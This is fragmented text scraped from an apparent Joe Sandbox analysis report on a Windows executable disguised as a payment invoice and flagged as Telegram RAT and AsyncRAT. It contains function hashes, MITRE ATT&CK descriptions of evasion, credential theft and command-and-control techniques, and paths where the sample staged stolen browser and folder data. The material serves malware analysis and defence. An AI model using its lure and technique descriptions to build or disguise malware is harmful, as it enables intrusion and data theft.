Opcode Fuzzy Hash: bd78e490133fb95ec91e13f1b64334d177b0a485195e4a8081d821e363c9f681
Instruction Fuzzy Hash: 9DD02E3670016A174B58726E202503FA69F8FC68713A0046AF809EB34CCE64AC8243E1

Function 01711718 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.4116322515.0000000001710000.00000040.00000800.00020000.00000000.sdmp, Offset: 01710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1710000_SFHAWxtoIpgL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 11c620d97c58304cfda4dbe591b17b01c97e27723a34128dde89e7fe8a2b9600
Instruction ID: 67dba699d023749f11394bc4ece970bbcc774211c932f63114a2a7d49af2410d
Opcode Fuzzy Hash: 11c620d97c58304cfda4dbe591b17b01c97e27723a34128dde89e7fe8a2b9600
Instruction Fuzzy Hash: 68E0C2313001104F8748A77EE88485FBBDAEFCD13136504BAF109C7325DD60CC014390

Function 01712EF0 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.4116322515.0000000001710000.00000040.00000800.00020000.00000000.sdmp, Offset: 01710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1710000_SFHAWxtoIpgL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f65a1f9c6f97cecb2e9b10faea547f1a977b781eb5b65874cbdf46ad0244b9ff
Instruction ID: c2898433708f9cf81532673fa81840fe8755af3605c36c0567bb969b75689a34
Opcode Fuzzy Hash: f65a1f9c6f97cecb2e9b10faea547f1a977b781eb5b65874cbdf46ad0244b9ff
Instruction Fuzzy Hash: D5D05B70A0110DEFCB40EFA8F90159D77F5FB44201B504599D808E7300DA311F149B90

Function 017180E4 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.4116322515.0000000001710000.00000040.00000800.00020000.00000000.sdmp, Offset: 01710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1710000_SFHAWxtoIpgL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 61a2d8a35aa506d886e98ad3350f0f60496bd6483ee7abc2542b1a4e8410232a
Instruction ID: 90a0b55486dbb15fbe83cb1610c5e8941ca591654c096108d03654ea98e918d9
Opcode Fuzzy Hash: 61a2d8a35aa506d886e98ad3350f0f60496bd6483ee7abc2542b1a4e8410232a
Instruction Fuzzy Hash: A9D0A731F00214CBCB00E668F4142AD7771EB84340F104450E819973CCDB3C8D1187C2

Function 017175E6 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.4116322515.0000000001710000.00000040.00000800.00020000.00000000.sdmp, Offset: 01710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1710000_SFHAWxtoIpgL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d4ca5941c370a7ee3204df43b4a6538e7710b7aabb94b0b7aa213a9b75ec66b2
Instruction ID: 92dc9839107b43d911edf3dd1a8f4f67fc6255e7314d5fd5521eabe926918443
Opcode Fuzzy Hash: d4ca5941c370a7ee3204df43b4a6538e7710b7aabb94b0b7aa213a9b75ec66b2
Instruction Fuzzy Hash: AEC01230B001059BC618FF5CF848924B795FB843413001458DC0A87740EE259C30DB22

Function 01718940 Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.4116322515.0000000001710000.00000040.00000800.00020000.00000000.sdmp, Offset: 01710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1710000_SFHAWxtoIpgL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6758febd527ae6abc33a32ab396e1d4ceea815bf7c567c86d6132cb7b9b69c18
Instruction ID: 0ba25b176b0663ba3b3cdf351f36fa557c2df79ef769689234f79ead2e9a9af4
Opcode Fuzzy Hash: 6758febd527ae6abc33a32ab396e1d4ceea815bf7c567c86d6132cb7b9b69c18
Instruction Fuzzy Hash: C0C08072C145504FCF12FF14C6091047730D71350130D0491DC296321FCB153C19D705

Function 017109A2 Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.4116322515.0000000001710000.00000040.00000800.00020000.00000000.sdmp, Offset: 01710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1710000_SFHAWxtoIpgL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e747a4bcd6d3456f6dcdee517ea27ab02370eff1c0c8a3891f537a0a554848de
Instruction ID: eb049b7d7994e5c3aa19b0ad364bb586256d0c22f0f2bbd0384fef04a22bb97d
Opcode Fuzzy Hash: e747a4bcd6d3456f6dcdee517ea27ab02370eff1c0c8a3891f537a0a554848de
Instruction Fuzzy Hash: EEC08CB080428ACAF72127ACD83D32CFF12FB40B01F022095F8A32824D8E64049C5713

Function 01710986 Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.4116322515.0000000001710000.00000040.00000800.00020000.00000000.sdmp, Offset: 01710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1710000_SFHAWxtoIpgL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d83a21805cd0aee5e21aa4920d9e5ecee934917cba9482a4fe97df1fc8e18356
Instruction ID: 246332e830274731d900de26905d06fdb552daf87929b0be12a7af717feddf0a
Opcode Fuzzy Hash: d83a21805cd0aee5e21aa4920d9e5ecee934917cba9482a4fe97df1fc8e18356
Instruction Fuzzy Hash: F1C08CB081428ACAFB21176CD83D32CFE13F780B02F02209AF4E32824D8E64049C9B13

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Invoice-BL. Payment TT $ 28,945.99.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Telegram RAT

Threatname: AsyncRAT

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Persistence and Installation Behavior

Stealing of Sensitive Information

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\3dc049ac46753dc0583adb938675a965\user@932923_en-CH\Browsers\Firefox\Bookmarks.txt

C:\Users\user\AppData\Local\3dc049ac46753dc0583adb938675a965\user@932923_en-CH\Browsers\Firefox\History.txt

C:\Users\user\AppData\Local\3dc049ac46753dc0583adb938675a965\user@932923_en-CH\Browsers\Google\History.txt

C:\Users\user\AppData\Local\3dc049ac46753dc0583adb938675a965\user@932923_en-CH\Directories\Desktop.txt

C:\Users\user\AppData\Local\3dc049ac46753dc0583adb938675a965\user@932923_en-CH\Directories\Documents.txt

C:\Users\user\AppData\Local\3dc049ac46753dc0583adb938675a965\user@932923_en-CH\Directories\Downloads.txt

C:\Users\user\AppData\Local\3dc049ac46753dc0583adb938675a965\user@932923_en-CH\Directories\OneDrive.txt

C:\Users\user\AppData\Local\3dc049ac46753dc0583adb938675a965\user@932923_en-CH\Directories\Pictures.txt

C:\Users\user\AppData\Local\3dc049ac46753dc0583adb938675a965\user@932923_en-CH\Directories\Startup.txt

Windows Analysis Report
Invoice-BL. Payment TT $ 28,945.99.exe

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre